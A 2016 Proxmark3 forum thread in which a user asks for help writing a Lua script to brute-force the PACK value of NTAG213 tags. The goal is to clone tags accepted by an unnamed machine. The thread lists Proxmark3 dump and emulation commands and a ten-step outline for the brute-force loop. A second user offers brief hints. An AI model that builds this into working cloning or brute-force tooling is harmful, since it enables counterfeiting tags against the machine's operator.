Program a PACK brute force attack.

greatone76 · 2016-06-02 02:59:43

I have an NTAG213 tag. For each tag I can listen to the reader and get the key/password for the tag. When the reader gives the key/password to the tag the tag gives back the PACK. Each tag appears to have a unique PACK and the check is done internally in the reader/machine. I would like to use blank tags and create new tags that will work in the machine. I plan to get a fresh NTAG213 tag and put it in the machine to get the key/password. I would then like to take the UID and the key/password (and acceptable data on the rest of the tag for proper use) to emulate the tag on the PM3. Where I need help is programing something to take that base data and cycle through all of the values of the PACK. The PACK is a 4 digit Hex value, so it may take a while but should not be unreasonable to brute force figure out the PACK. I could then go back to the original blank tag and copy in the correct data including the key/password and PACK to get the tag to work in the machine.

After much work I have got the iceman fork to work in his new docker container. That is where I would hope to add a lua script or daily easily be able to branch off of for this program. I have successfully dumped the contents of a tag to an .eml file using hf mfu dump. I have been successfully fully emulating a tag using the .eml file and the hf 14a sim t 7. I have the hf 14a list from both the correct and incorrect PACK being used in the machine, so you can see the difference to start the logic engine. I currently have a logic analyzer connected to the PN512 reader in the machine, so I also have the Saleae Logic files that I can give you of the same thing showing the communication between the machine and tag to figure out how to get the logic engine to work. I have the .eml file for the emulation that I can give out.

I have minimal coding experience and feel it would take me a few months to figure out programing and getting this to work correctly, so I'm looking to save myself some time and hassle and would like to find someone that can put this together for me for a reasonable fee in a reasonably quick time frame.

Feel free to ask questions. I have the files referenced above in my google drive, so easy to e-mail out if you want to see then to get an idea of what it might take to create the coding. Just let me know here if you are interested and how I can get ahold of you. I would be willing to share the details of what the machine and system the tag is used for once I have someone on board. It is not an access application or anything highly secure.

greatone76 · 2016-06-04 03:18:06

Am I missing something here is this way more complex then I realize? Is there a better place way or place to hire someone to help me with my mission with the PM3?

iceman · 2016-06-04 15:45:44

its not too complex, thing is how to get feedback to pm3 client running the lua script that it was successful.

I guess you can send a PACK on a given auth, and see if it sends another command...

Why not figure out if the PACK used is created with an algo and try solving that part?

greatone76 · 2016-06-04 19:24:30

I've taken the time to try to solve the algo by hand and when I've had no success with that, I moved onto CRC REVENG. I'm fairly confident it is CRC, but I just run into an issue where there are too many options and variables. I don't know what the original input is. The UID, the key a combination of both. What order of any of the previous things to used in the input. Left to right input, right to left bit reads. I don't have a guess at an initial value, an XOR on the input or an XOR on the output. And a simple salt of unknown length on the UID and I have no chance ever of getting to the end of the algorithm. I made standard guesses and got absolutely nowhere. That is what has gotten me to this point of wanting to brute force the pack. My plan is to use the attack to get some simplified inputs like a UID of 0000000000000 and see if I can gain any data on the algo. If anyone had advice on a better way to look into the algorithm I'm game.

When a correct PACK is given to the machine/reader, right after the tag gives the pack the reader asks to read the next block. If the PACK is incorrect the reader stops and then gives anti collision data and restarts later. So the logic point is basically after the tag has sent the PACK if the reader responds with read block 8 it worked if not take the next pack and start again.

Not knowing exactly how the lua scripting works my base plan was to basically use the LUA script as a macro over the pm program. Below being the basic outline:

Have inputs of the "UID" of the Tag and the "Key" and a "Timing Space"

1. hf mf eload the base .eml file in the PM3 memory
2. hf mf eset the input "UID" "Key" and initial "PACK"
3. hf 14a sim t7
4. wait for read using "Timing Space" and then stop sim
5. hf list to file or to variable
6. Find "PACK" in file/variable
7. Look through the next X number of characters for "30 08" (the read next block command)
8. if found output PACK
9. if not found hf mf eset next PACK attempt
10. Repeat from Step 3.

And rather then learning C, learning LUA scripting and figuring out from scratch coding for the PM3 I would like to hire a partner to assist with the coding that has experience with those things.

greatone76 · 2016-06-15 18:20:42

Message Removed.

Last edited by greatone76 (2016-06-16 04:28:39)

iceman · 2016-06-15 19:49:04

I think you missunderstand what motivates people here, a lot of them me included has daytime jobs which pays well being in software business. I can only speak for myself but I do things that I find funny and interests me. Others might be interested if there is a new functionality that will increase their business potential within rfid security.

I'm not here for the money, well, six figures and we can speak about it.

Proxmark3 community

Announcement

#1 2016-06-02 02:59:43

Program a PACK brute force attack.

#2 2016-06-04 03:18:06

Re: Program a PACK brute force attack.

#3 2016-06-04 15:45:44

Re: Program a PACK brute force attack.

#4 2016-06-04 19:24:30

Re: Program a PACK brute force attack.

#5 2016-06-15 18:20:42

Re: Program a PACK brute force attack.

#6 2016-06-15 19:49:04

Re: Program a PACK brute force attack.

Board footer